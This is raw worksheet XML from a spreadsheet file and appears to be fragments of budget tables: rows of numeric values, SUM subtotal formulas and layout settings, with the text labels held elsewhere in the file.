      <c r="A11" s="482">
        <v>3</v>
      </c>
      <c r="B11" s="484" t="s">
        <v>435</v>
      </c>
      <c r="C11" s="482">
        <v>900</v>
      </c>
    </row>
    <row r="12" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A12" s="663" t="s">
        <v>436</v>
      </c>
      <c r="B12" s="662"/>
      <c r="C12" s="481">
        <f>SUM(C13:C14)</f>
        <v>2246</v>
      </c>
    </row>
    <row r="13" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A13" s="482">
        <v>1</v>
      </c>
      <c r="B13" s="484" t="s">
        <v>437</v>
      </c>
      <c r="C13" s="482">
        <v>1146</v>
      </c>
    </row>
    <row r="14" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A14" s="482">
        <v>2</v>
      </c>
      <c r="B14" s="484" t="s">
        <v>438</v>
      </c>
      <c r="C14" s="482">
        <v>1100</v>
      </c>
    </row>
    <row r="15" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A15" s="663" t="s">
        <v>439</v>
      </c>
      <c r="B15" s="662"/>
      <c r="C15" s="481">
        <f>SUM(C16:C20)</f>
        <v>6534</v>
      </c>
    </row>
    <row r="16" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A16" s="482">
        <v>1</v>
      </c>
      <c r="B16" s="484" t="s">
        <v>440</v>
      </c>
      <c r="C16" s="482">
        <v>1197</v>
      </c>
    </row>
    <row r="17" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A17" s="482">
        <v>2</v>
      </c>
      <c r="B17" s="484" t="s">
        <v>441</v>
      </c>
      <c r="C17" s="482">
        <v>1073</v>
      </c>
    </row>
    <row r="18" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A18" s="482">
        <v>3</v>
      </c>
      <c r="B18" s="484" t="s">
        <v>816</v>
      </c>
      <c r="C18" s="482">
        <v>805</v>
      </c>
    </row>
    <row r="19" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A19" s="482">
        <v>4</v>
      </c>
      <c r="B19" s="484" t="s">
        <v>443</v>
      </c>
      <c r="C19" s="482">
        <v>2559</v>
      </c>
    </row>
    <row r="20" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A20" s="482">
        <v>5</v>
      </c>
      <c r="B20" s="484" t="s">
        <v>444</v>
      </c>
      <c r="C20" s="482">
        <v>900</v>
      </c>
    </row>
    <row r="21" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A21" s="663" t="s">
        <v>445</v>
      </c>
      <c r="B21" s="662"/>
      <c r="C21" s="481">
        <f>SUM(C22:C22)</f>
        <v>785</v>
      </c>
    </row>
    <row r="22" spans="1:3" s="475" customFormat="1" ht="26.1" customHeight="1">
      <c r="A22" s="482">
        <v>1</v>
      </c>
      <c r="B22" s="484" t="s">
        <v>446</v>
      </c>
      <c r="C22" s="482">
        <v>785</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="A12:B12"/>
    <mergeCell ref="A15:B15"/>
    <mergeCell ref="A21:B21"/>
    <mergeCell ref="A1:C1"/>
    <mergeCell ref="A2:C2"/>
    <mergeCell ref="A5:B5"/>
    <mergeCell ref="A6:B6"/>
    <mergeCell ref="A8:B8"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <pageMargins left="0.75" right="0.75" top="1" bottom="1" header="0.5" footer="0.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Zeros="0" topLeftCell="A7" zoomScale="89" zoomScaleNormal="89" workbookViewId="0">
      <selection activeCell="F10" sqref="F10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="42.7109375" style="452" customWidth="1"/>
    <col min="2" max="2" width="12.7109375" style="452" customWidth="1"/>
    <col min="3" max="3" width="12.140625" style="452" customWidth="1"/>
    <col min="4" max="4" width="12.42578125" style="465" customWidth="1"/>
    <col min="5" max="5" width="13.28515625" style="452" customWidth="1"/>
    <col min="6" max="7" width="10.5703125" style="452" customWidth="1"/>
    <col min="8" max="16384" width="10" style="452"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" s="445" customFormat="1" ht="21" customHeight="1">
      <c r="A1" s="466" t="s">
        <v>817</v>
      </c>
      <c r="B1" s="454"/>
      <c r="C1" s="454"/>
      <c r="D1" s="467"/>
      <c r="E1" s="454"/>
    </row>
    <row r="2" spans="1:5" s="446" customFormat="1" ht="24.75" customHeight="1">
      <c r="A2" s="700" t="s">
        <v>818</v>
      </c>
      <c r="B2" s="700"/>
      <c r="C2" s="700"/>
      <c r="D2" s="700"/>
      <c r="E2" s="700"/>
    </row>
    <row r="3" spans="1:5" s="447" customFormat="1" ht="27" customHeight="1">
      <c r="A3" s="385"/>
      <c r="B3" s="468"/>
      <c r="C3" s="468"/>
      <c r="D3" s="469"/>
      <c r="E3" s="418" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:5" s="449" customFormat="1" ht="36" customHeight="1">
      <c r="A4" s="702" t="s">
        <v>819</v>
      </c>
      <c r="B4" s="647" t="s">
        <v>272</v>
      </c>
      <c r="C4" s="647" t="s">
        <v>273</v>
      </c>
      <c r="D4" s="704" t="s">
        <v>274</v>
      </c>
      <c r="E4" s="646" t="s">
        <v>275</v>
      </c>
    </row>
    <row r="5" spans="1:5" s="449" customFormat="1" ht="36" customHeight="1">
      <c r="A5" s="703"/>
      <c r="B5" s="648"/>
      <c r="C5" s="648"/>
      <c r="D5" s="705"/>
      <c r="E5" s="646"/>
    </row>
    <row r="6" spans="1:5" ht="36" customHeight="1">
      <c r="A6" s="422" t="s">
        <v>820</v>
      </c>
      <c r="B6" s="470"/>
      <c r="C6" s="470"/>
      <c r="D6" s="471"/>
      <c r="E6" s="470"/>
    </row>
    <row r="7" spans="1:5" ht="36" customHeight="1">
      <c r="A7" s="422" t="s">
        <v>821</v>
      </c>
      <c r="B7" s="433"/>
      <c r="C7" s="433"/>
      <c r="D7" s="471"/>
      <c r="E7" s="433"/>
    </row>
    <row r="8" spans="1:5" ht="36" customHeight="1">
      <c r="A8" s="422" t="s">
        <v>822</v>
      </c>
      <c r="B8" s="433"/>
      <c r="C8" s="433"/>
      <c r="D8" s="471"/>
      <c r="E8" s="433"/>
    </row>
    <row r="9" spans="1:5" ht="36" customHeight="1">
      <c r="A9" s="422" t="s">
        <v>823</v>
      </c>
      <c r="B9" s="433">
        <v>12758</v>
      </c>
      <c r="C9" s="433">
        <v>3600</v>
      </c>
      <c r="D9" s="471">
        <v>3600</v>
      </c>
      <c r="E9" s="433">
        <v>1500</v>
      </c>
    </row>
    <row r="10" spans="1:5" ht="36" customHeight="1">
      <c r="A10" s="422" t="s">
        <v>824</v>
      </c>
      <c r="B10" s="433"/>
      <c r="C10" s="433"/>
      <c r="D10" s="471"/>
      <c r="E10" s="433"/>
    </row>
    <row r="11" spans="1:5" ht="36" customHeight="1">
      <c r="A11" s="424" t="s">
        <v>825</v>
      </c>
      <c r="B11" s="433"/>
      <c r="C11" s="433"/>
      <c r="D11" s="471"/>
      <c r="E11" s="433"/>
    </row>
    <row r="12" spans="1:5" ht="36" customHeight="1">
      <c r="A12" s="422" t="s">
        <v>826</v>
      </c>
      <c r="B12" s="433">
        <v>9263</v>
      </c>
      <c r="C12" s="433">
        <v>11046</v>
      </c>
      <c r="D12" s="471">
        <v>11046</v>
      </c>
      <c r="E12" s="433">
        <v>8000</v>
      </c>
    </row>
    <row r="13" spans="1:5" s="449" customFormat="1" ht="36" customHeight="1">
      <c r="A13" s="426" t="s">
        <v>299</v>
      </c>
      <c r="B13" s="427">
        <f>SUM(B6:B12)</f>
        <v>22021</v>
      </c>
      <c r="C13" s="427">
        <f>SUM(C6:C12)</f>
        <v>14646</v>
      </c>
      <c r="D13" s="427">
        <f>SUM(D6:D12)</f>
        <v>14646</v>
      </c>
      <c r="E13" s="427">
        <f>SUM(E6:E12)</f>
        <v>9500</v>
      </c>
    </row>
    <row r="14" spans="1:5" s="449" customFormat="1" ht="36" customHeight="1">
      <c r="A14" s="428" t="s">
        <v>300</v>
      </c>
      <c r="B14" s="429">
        <f>SUM(B15:B18)</f>
        <v>425380</v>
      </c>
      <c r="C14" s="429">
        <f>SUM(C15:C18)</f>
        <v>388750</v>
      </c>
      <c r="D14" s="429">
        <f>SUM(D15:D18)</f>
        <v>423750</v>
      </c>
      <c r="E14" s="429">
        <f>SUM(E15:E18)</f>
        <v>449032</v>
      </c>
    </row>
    <row r="15" spans="1:5" ht="36" customHeight="1">
      <c r="A15" s="430" t="s">
        <v>827</v>
      </c>
      <c r="B15" s="432">
        <v>155015</v>
      </c>
      <c r="C15" s="432">
        <v>130770</v>
      </c>
      <c r="D15" s="472">
        <v>165770</v>
      </c>
      <c r="E15" s="432">
        <v>190350</v>
      </c>
    </row>
    <row r="16" spans="1:5" ht="36" customHeight="1">
      <c r="A16" s="422" t="s">
        <v>828</v>
      </c>
      <c r="B16" s="433">
        <v>242864</v>
      </c>
      <c r="C16" s="433">
        <v>240478</v>
      </c>
      <c r="D16" s="471">
        <v>240478</v>
      </c>
      <c r="E16" s="433">
        <v>241180</v>
      </c>
    </row>
    <row r="17" spans="1:11" ht="36" customHeight="1">
      <c r="A17" s="422" t="s">
        <v>305</v>
      </c>
      <c r="B17" s="433"/>
      <c r="C17" s="433"/>
      <c r="D17" s="471"/>
      <c r="E17" s="433"/>
    </row>
    <row r="18" spans="1:11" ht="36" customHeight="1">
      <c r="A18" s="422" t="s">
        <v>307</v>
      </c>
      <c r="B18" s="433">
        <v>27501</v>
      </c>
      <c r="C18" s="433">
        <v>17502</v>
      </c>
      <c r="D18" s="471">
        <v>17502</v>
      </c>
      <c r="E18" s="433">
        <v>17502</v>
      </c>
    </row>
    <row r="19" spans="1:11" ht="36" customHeight="1">
      <c r="A19" s="426" t="s">
        <v>308</v>
      </c>
      <c r="B19" s="434">
        <f>B13+B14</f>
        <v>447401</v>
      </c>
      <c r="C19" s="434">
        <f>C13+C14</f>
        <v>403396</v>
      </c>
      <c r="D19" s="434">
        <f>D13+D14</f>
        <v>438396</v>
      </c>
      <c r="E19" s="434">
        <f>E13+E14</f>
        <v>458532</v>
      </c>
      <c r="F19" s="465"/>
      <c r="G19" s="465"/>
      <c r="H19" s="473">
        <f>E19-'[1]23'!E41</f>
        <v>0</v>
      </c>
      <c r="I19" s="473">
        <f>B19-'[1]23'!B41</f>
        <v>0</v>
      </c>
      <c r="J19" s="473">
        <f>D19-'[1]23'!D41</f>
        <v>0</v>
      </c>
      <c r="K19" s="473">
        <f>C19-'[1]23'!C41</f>
        <v>0</v>
      </c>
    </row>
    <row r="20" spans="1:11" ht="36.950000000000003" customHeight="1">
      <c r="A20" s="701"/>
      <c r="B20" s="701"/>
      <c r="C20" s="701"/>
      <c r="D20" s="701"/>
      <c r="E20" s="701"/>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="A2:E2"/>
    <mergeCell ref="A20:E20"/>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85"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Zeros="0" zoomScale="95" zoomScaleNormal="95" workbookViewId="0">
      <selection activeCell="F12" sqref="F12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="52.140625" style="451" customWidth="1"/>
    <col min="2" max="5" width="11.28515625" style="452" customWidth="1"/>
    <col min="6" max="16384" width="10" style="452"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5" s="445" customFormat="1" ht="16.7" customHeight="1">
      <c r="A1" s="453" t="s">
        <v>829</v>
      </c>
      <c r="B1" s="454"/>
      <c r="C1" s="454"/>
      <c r="D1" s="454"/>
      <c r="E1" s="454"/>
    </row>
    <row r="2" spans="1:5" s="446" customFormat="1" ht="22.5" customHeight="1">
      <c r="A2" s="700" t="s">
        <v>830</v>
      </c>
      <c r="B2" s="700"/>
      <c r="C2" s="700"/>
      <c r="D2" s="700"/>
      <c r="E2" s="700"/>
    </row>
    <row r="3" spans="1:5" s="447" customFormat="1" ht="24" customHeight="1">
      <c r="A3" s="404"/>
      <c r="B3" s="455"/>
      <c r="C3" s="455"/>
      <c r="D3" s="455"/>
      <c r="E3" s="405" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:5" s="448" customFormat="1" ht="21" customHeight="1">
      <c r="A4" s="706" t="s">
        <v>344</v>
      </c>
      <c r="B4" s="646" t="s">
        <v>272</v>
      </c>
      <c r="C4" s="647" t="s">
        <v>273</v>
      </c>
      <c r="D4" s="707" t="s">
        <v>274</v>
      </c>
      <c r="E4" s="708" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="5" spans="1:5" s="448" customFormat="1" ht="29.25" customHeight="1">
      <c r="A5" s="706"/>
      <c r="B5" s="646"/>
      <c r="C5" s="648"/>
      <c r="D5" s="707"/>
      <c r="E5" s="709"/>
    </row>
    <row r="6" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A6" s="456" t="s">
        <v>831</v>
      </c>
      <c r="B6" s="457">
        <f>B7+B8</f>
        <v>17</v>
      </c>
      <c r="C6" s="457">
        <f>C7+C8</f>
        <v>0</v>
      </c>
      <c r="D6" s="457">
        <f>D7+D8</f>
        <v>0</v>
      </c>
      <c r="E6" s="457">
        <f>E7+E8</f>
        <v>37</v>
      </c>
    </row>
    <row r="7" spans="1:5" ht="21" customHeight="1">
      <c r="A7" s="396" t="s">
        <v>832</v>
      </c>
      <c r="B7" s="412">
        <v>17</v>
      </c>
      <c r="C7" s="412"/>
      <c r="D7" s="412"/>
      <c r="E7" s="412">
        <v>37</v>
      </c>
    </row>
    <row r="8" spans="1:5" ht="21" customHeight="1">
      <c r="A8" s="396" t="s">
        <v>833</v>
      </c>
      <c r="B8" s="412"/>
      <c r="C8" s="412"/>
      <c r="D8" s="412"/>
      <c r="E8" s="412"/>
    </row>
    <row r="9" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A9" s="456" t="s">
        <v>834</v>
      </c>
      <c r="B9" s="457">
        <f>B10</f>
        <v>443</v>
      </c>
      <c r="C9" s="457">
        <f>C10</f>
        <v>859</v>
      </c>
      <c r="D9" s="457">
        <f>D10</f>
        <v>859</v>
      </c>
      <c r="E9" s="457">
        <f>E10</f>
        <v>446</v>
      </c>
    </row>
    <row r="10" spans="1:5" ht="21" customHeight="1">
      <c r="A10" s="396" t="s">
        <v>835</v>
      </c>
      <c r="B10" s="412">
        <v>443</v>
      </c>
      <c r="C10" s="412">
        <v>859</v>
      </c>
      <c r="D10" s="412">
        <v>859</v>
      </c>
      <c r="E10" s="412">
        <v>446</v>
      </c>
    </row>
    <row r="11" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A11" s="456" t="s">
        <v>836</v>
      </c>
      <c r="B11" s="457">
        <f>SUM(B12:B19)</f>
        <v>227865</v>
      </c>
      <c r="C11" s="457">
        <f>SUM(C12:C19)</f>
        <v>246034</v>
      </c>
      <c r="D11" s="457">
        <f>SUM(D12:D19)</f>
        <v>246034</v>
      </c>
      <c r="E11" s="457">
        <f>SUM(E12:E19)</f>
        <v>212520</v>
      </c>
    </row>
    <row r="12" spans="1:5" ht="21" customHeight="1">
      <c r="A12" s="396" t="s">
        <v>837</v>
      </c>
      <c r="B12" s="412">
        <v>221107</v>
      </c>
      <c r="C12" s="412">
        <v>243034</v>
      </c>
      <c r="D12" s="412">
        <v>243034</v>
      </c>
      <c r="E12" s="412">
        <v>211020</v>
      </c>
    </row>
    <row r="13" spans="1:5" ht="21" customHeight="1">
      <c r="A13" s="396" t="s">
        <v>838</v>
      </c>
      <c r="B13" s="412"/>
      <c r="C13" s="412"/>
      <c r="D13" s="412"/>
      <c r="E13" s="412"/>
    </row>
    <row r="14" spans="1:5" ht="21" customHeight="1">
      <c r="A14" s="396" t="s">
        <v>839</v>
      </c>
      <c r="B14" s="412"/>
      <c r="C14" s="412"/>
      <c r="D14" s="412"/>
      <c r="E14" s="412"/>
    </row>
    <row r="15" spans="1:5" ht="21" customHeight="1">
      <c r="A15" s="396" t="s">
        <v>840</v>
      </c>
      <c r="B15" s="412">
        <v>6758</v>
      </c>
      <c r="C15" s="412">
        <v>3000</v>
      </c>
      <c r="D15" s="412">
        <v>3000</v>
      </c>
      <c r="E15" s="412">
        <v>1500</v>
      </c>
    </row>
    <row r="16" spans="1:5" ht="21" customHeight="1">
      <c r="A16" s="396" t="s">
        <v>841</v>
      </c>
      <c r="B16" s="412"/>
      <c r="C16" s="412"/>
      <c r="D16" s="412"/>
      <c r="E16" s="412"/>
    </row>
    <row r="17" spans="1:5" ht="21" customHeight="1">
      <c r="A17" s="396" t="s">
        <v>842</v>
      </c>
      <c r="B17" s="412"/>
      <c r="C17" s="412"/>
      <c r="D17" s="412"/>
      <c r="E17" s="412"/>
    </row>
    <row r="18" spans="1:5" ht="21" customHeight="1">
      <c r="A18" s="396" t="s">
        <v>843</v>
      </c>
      <c r="B18" s="412"/>
      <c r="C18" s="412"/>
      <c r="D18" s="412"/>
      <c r="E18" s="412"/>
    </row>
    <row r="19" spans="1:5" ht="36" customHeight="1">
      <c r="A19" s="396" t="s">
        <v>844</v>
      </c>
      <c r="B19" s="412"/>
      <c r="C19" s="412"/>
      <c r="D19" s="412"/>
      <c r="E19" s="412"/>
    </row>
    <row r="20" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A20" s="456" t="s">
        <v>845</v>
      </c>
      <c r="B20" s="457">
        <f>B21</f>
        <v>0</v>
      </c>
      <c r="C20" s="457">
        <f>C21</f>
        <v>0</v>
      </c>
      <c r="D20" s="457">
        <f>D21</f>
        <v>0</v>
      </c>
      <c r="E20" s="457">
        <f>E21</f>
        <v>0</v>
      </c>
    </row>
    <row r="21" spans="1:5" ht="21" customHeight="1">
      <c r="A21" s="396" t="s">
        <v>846</v>
      </c>
      <c r="B21" s="412"/>
      <c r="C21" s="412"/>
      <c r="D21" s="412"/>
      <c r="E21" s="412"/>
    </row>
    <row r="22" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A22" s="456" t="s">
        <v>847</v>
      </c>
      <c r="B22" s="457">
        <f>SUM(B23:B24)</f>
        <v>0</v>
      </c>
      <c r="C22" s="457">
        <f>SUM(C23:C24)</f>
        <v>0</v>
      </c>
      <c r="D22" s="457">
        <f>SUM(D23:D24)</f>
        <v>0</v>
      </c>
      <c r="E22" s="457">
        <f>SUM(E23:E24)</f>
        <v>0</v>
      </c>
    </row>
    <row r="23" spans="1:5" ht="21" customHeight="1">
      <c r="A23" s="396" t="s">
        <v>848</v>
      </c>
      <c r="B23" s="412"/>
      <c r="C23" s="412"/>
      <c r="D23" s="412"/>
      <c r="E23" s="412"/>
    </row>
    <row r="24" spans="1:5" ht="21" customHeight="1">
      <c r="A24" s="396" t="s">
        <v>849</v>
      </c>
      <c r="B24" s="412"/>
      <c r="C24" s="412"/>
      <c r="D24" s="412"/>
      <c r="E24" s="412"/>
    </row>
    <row r="25" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A25" s="456" t="s">
        <v>850</v>
      </c>
      <c r="B25" s="457">
        <f>SUM(B26:B28)</f>
        <v>105298</v>
      </c>
      <c r="C25" s="457">
        <f>SUM(C26:C28)</f>
        <v>90015</v>
      </c>
      <c r="D25" s="457">
        <f>SUM(D26:D28)</f>
        <v>125015</v>
      </c>
      <c r="E25" s="457">
        <f>SUM(E26:E28)</f>
        <v>147281</v>
      </c>
    </row>
    <row r="26" spans="1:5" ht="33" customHeight="1">
      <c r="A26" s="396" t="s">
        <v>851</v>
      </c>
      <c r="B26" s="412">
        <v>105000</v>
      </c>
      <c r="C26" s="412">
        <v>90000</v>
      </c>
      <c r="D26" s="412">
        <v>125000</v>
      </c>
      <c r="E26" s="412">
        <v>147000</v>
      </c>
    </row>
    <row r="27" spans="1:5" ht="21" customHeight="1">
      <c r="A27" s="396" t="s">
        <v>852</v>
      </c>
      <c r="B27" s="412"/>
      <c r="C27" s="412"/>
      <c r="D27" s="412"/>
      <c r="E27" s="412"/>
    </row>
    <row r="28" spans="1:5" ht="21" customHeight="1">
      <c r="A28" s="396" t="s">
        <v>853</v>
      </c>
      <c r="B28" s="412">
        <v>298</v>
      </c>
      <c r="C28" s="412">
        <v>15</v>
      </c>
      <c r="D28" s="412">
        <v>15</v>
      </c>
      <c r="E28" s="412">
        <v>281</v>
      </c>
    </row>
    <row r="29" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A29" s="456" t="s">
        <v>854</v>
      </c>
      <c r="B29" s="457">
        <f>SUM(B30:B34)</f>
        <v>17589</v>
      </c>
      <c r="C29" s="457">
        <f>SUM(C30:C34)</f>
        <v>21188</v>
      </c>
      <c r="D29" s="457">
        <f>SUM(D30:D34)</f>
        <v>21188</v>
      </c>
      <c r="E29" s="457">
        <f>SUM(E30:E34)</f>
        <v>21748</v>
      </c>
    </row>
    <row r="30" spans="1:5" ht="21" customHeight="1">
      <c r="A30" s="396" t="s">
        <v>855</v>
      </c>
      <c r="B30" s="412">
        <v>5185</v>
      </c>
      <c r="C30" s="412"/>
      <c r="D30" s="412"/>
      <c r="E30" s="412">
        <v>5496</v>
      </c>
    </row>
    <row r="31" spans="1:5" ht="21" customHeight="1">
      <c r="A31" s="396" t="s">
        <v>856</v>
      </c>
      <c r="B31" s="412">
        <v>1570</v>
      </c>
      <c r="C31" s="412"/>
      <c r="D31" s="412"/>
      <c r="E31" s="412">
        <v>1273</v>
      </c>
    </row>
    <row r="32" spans="1:5" ht="21" customHeight="1">
      <c r="A32" s="396" t="s">
        <v>857</v>
      </c>
      <c r="B32" s="412">
        <v>806</v>
      </c>
      <c r="C32" s="412"/>
      <c r="D32" s="412"/>
      <c r="E32" s="412">
        <v>806</v>
      </c>
    </row>
    <row r="33" spans="1:5" ht="21" customHeight="1">
      <c r="A33" s="396" t="s">
        <v>858</v>
      </c>
      <c r="B33" s="412">
        <v>10028</v>
      </c>
      <c r="C33" s="412">
        <v>21188</v>
      </c>
      <c r="D33" s="412">
        <v>21188</v>
      </c>
      <c r="E33" s="412">
        <v>14173</v>
      </c>
    </row>
    <row r="34" spans="1:5" ht="21" customHeight="1">
      <c r="A34" s="396" t="s">
        <v>859</v>
      </c>
      <c r="B34" s="412"/>
      <c r="C34" s="412"/>
      <c r="D34" s="412"/>
      <c r="E34" s="412"/>
    </row>
    <row r="35" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A35" s="458" t="s">
        <v>334</v>
      </c>
      <c r="B35" s="457">
        <f>B6+B9+B11+B22+B25+B29+B20</f>
        <v>351212</v>
      </c>
      <c r="C35" s="457">
        <f>C6+C9+C11+C22+C25+C29+C20</f>
        <v>358096</v>
      </c>
      <c r="D35" s="457">
        <f>D6+D9+D11+D22+D25+D29+D20</f>
        <v>393096</v>
      </c>
      <c r="E35" s="457">
        <f>E6+E9+E11+E22+E25+E29+E20</f>
        <v>382032</v>
      </c>
    </row>
    <row r="36" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A36" s="459" t="s">
        <v>335</v>
      </c>
      <c r="B36" s="457">
        <f>SUM(B37:B40)</f>
        <v>96189</v>
      </c>
      <c r="C36" s="457">
        <f>SUM(C37:C40)</f>
        <v>45300</v>
      </c>
      <c r="D36" s="457">
        <f>SUM(D37:D40)</f>
        <v>45300</v>
      </c>
      <c r="E36" s="457">
        <f>SUM(E37:E40)</f>
        <v>76500</v>
      </c>
    </row>
    <row r="37" spans="1:5" s="450" customFormat="1" ht="21" customHeight="1">
      <c r="A37" s="460" t="s">
        <v>860</v>
      </c>
      <c r="B37" s="461">
        <v>51220</v>
      </c>
      <c r="C37" s="461">
        <v>45300</v>
      </c>
      <c r="D37" s="412">
        <v>45300</v>
      </c>
      <c r="E37" s="461">
        <v>45300</v>
      </c>
    </row>
    <row r="38" spans="1:5" ht="21" customHeight="1">
      <c r="A38" s="462" t="s">
        <v>337</v>
      </c>
      <c r="B38" s="412">
        <v>13491</v>
      </c>
      <c r="C38" s="412"/>
      <c r="D38" s="412"/>
      <c r="E38" s="412">
        <v>19200</v>
      </c>
    </row>
    <row r="39" spans="1:5" ht="21" customHeight="1">
      <c r="A39" s="462" t="s">
        <v>861</v>
      </c>
      <c r="B39" s="463">
        <v>13976</v>
      </c>
      <c r="C39" s="463"/>
      <c r="D39" s="412"/>
      <c r="E39" s="463"/>
    </row>
    <row r="40" spans="1:5" ht="21" customHeight="1">
      <c r="A40" s="462" t="s">
        <v>340</v>
      </c>
      <c r="B40" s="412">
        <v>17502</v>
      </c>
      <c r="C40" s="412"/>
      <c r="D40" s="412"/>
      <c r="E40" s="412">
        <v>12000</v>
      </c>
    </row>
    <row r="41" spans="1:5" s="449" customFormat="1" ht="21" customHeight="1">
      <c r="A41" s="464" t="s">
        <v>862</v>
      </c>
      <c r="B41" s="457">
        <f>B35+B36</f>
        <v>447401</v>
      </c>
      <c r="C41" s="457">
        <f>C35+C36</f>
        <v>403396</v>
      </c>
      <c r="D41" s="457">
        <f>D35+D36</f>
        <v>438396</v>
      </c>
      <c r="E41" s="457">
        <f>E35+E36</f>
        <v>458532</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="6">
    <mergeCell ref="A2:E2"/>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3"/>
  <sheetViews>
    <sheetView zoomScale="93" zoomScaleNormal="93" workbookViewId="0">
      <selection activeCell="F8" sqref="F8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="11.42578125" style="310" customWidth="1"/>
    <col min="2" max="2" width="11.28515625" style="311" customWidth="1"/>
    <col min="3" max="3" width="12.140625" style="311" customWidth="1"/>
    <col min="4" max="4" width="11.28515625" style="311" customWidth="1"/>
    <col min="5" max="5" width="11.5703125" style="311" customWidth="1"/>
    <col min="6" max="6" width="10.85546875" style="311" customWidth="1"/>
    <col min="7" max="7" width="11.85546875" style="311" customWidth="1"/>
    <col min="8" max="8" width="16.5703125" style="311" customWidth="1"/>
    <col min="9" max="16382" width="10" style="310"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" s="305" customFormat="1" ht="20.100000000000001" customHeight="1">
      <c r="A1" s="655" t="s">
        <v>863</v>
      </c>
      <c r="B1" s="656"/>
      <c r="C1" s="313"/>
      <c r="D1" s="313"/>
      <c r="E1" s="313"/>
      <c r="F1" s="313"/>
      <c r="G1" s="313"/>
      <c r="H1" s="313"/>
    </row>
    <row r="2" spans="1:8" s="306" customFormat="1" ht="36" customHeight="1">
      <c r="A2" s="710" t="s">
        <v>864</v>
      </c>
      <c r="B2" s="652"/>
      <c r="C2" s="652"/>
      <c r="D2" s="652"/>
      <c r="E2" s="652"/>
      <c r="F2" s="652"/>
      <c r="G2" s="652"/>
      <c r="H2" s="652"/>
    </row>
    <row r="3" spans="1:8" s="307" customFormat="1" ht="27.95" customHeight="1">
      <c r="A3" s="657" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="657"/>
      <c r="C3" s="657"/>
      <c r="D3" s="657"/>
      <c r="E3" s="657"/>
      <c r="F3" s="657"/>
      <c r="G3" s="657"/>
      <c r="H3" s="657"/>
    </row>
    <row r="4" spans="1:8" s="308" customFormat="1" ht="79.5" customHeight="1">
      <c r="A4" s="314" t="s">
        <v>382</v>
      </c>
      <c r="B4" s="339" t="s">
        <v>390</v>
      </c>
      <c r="C4" s="292" t="s">
        <v>865</v>
      </c>
      <c r="D4" s="292" t="s">
        <v>866</v>
      </c>
      <c r="E4" s="292" t="s">
        <v>867</v>
      </c>
      <c r="F4" s="292" t="s">
        <v>868</v>
      </c>
      <c r="G4" s="292" t="s">
        <v>869</v>
      </c>
      <c r="H4" s="292" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="5" spans="1:8" s="309" customFormat="1" ht="38.1" customHeight="1">
      <c r="A5" s="315" t="s">
        <v>390</v>
      </c>
      <c r="B5" s="316"/>
      <c r="C5" s="316"/>
      <c r="D5" s="316"/>
      <c r="E5" s="316"/>
      <c r="F5" s="316"/>
      <c r="G5" s="316"/>
      <c r="H5" s="316"/>
    </row>
    <row r="6" spans="1:8" s="310" customFormat="1" ht="38.1" customHeight="1">
      <c r="A6" s="654" t="s">
        <v>404</v>
      </c>
      <c r="B6" s="654"/>
      <c r="C6" s="654"/>
      <c r="D6" s="654"/>
      <c r="E6" s="654"/>
      <c r="F6" s="654"/>
      <c r="G6" s="654"/>
      <c r="H6" s="654"/>
    </row>
    <row r="7" spans="1:8" ht="38.1" customHeight="1"/>
    <row r="8" spans="1:8" ht="38.1" customHeight="1"/>
    <row r="9" spans="1:8" ht="38.1" customHeight="1"/>
    <row r="10" spans="1:8" ht="38.1" customHeight="1"/>
    <row r="11" spans="1:8" ht="38.1" customHeight="1"/>
    <row r="12" spans="1:8" ht="38.1" customHeight="1"/>
    <row r="13" spans="1:8" ht="26.1" customHeight="1"/>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A1:B1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A3:H3"/>
    <mergeCell ref="A6:H6"/>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24"/>
  <sheetViews>
    <sheetView zoomScale="98" zoomScaleNormal="98" workbookViewId="0">
      <selection activeCell="F8" sqref="F8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9.42578125" defaultRowHeight="12.75"/>
  <cols>
    <col min="1" max="1" width="6.7109375" style="439" customWidth="1"/>
    <col min="2" max="2" width="39.5703125" style="437" customWidth="1"/>
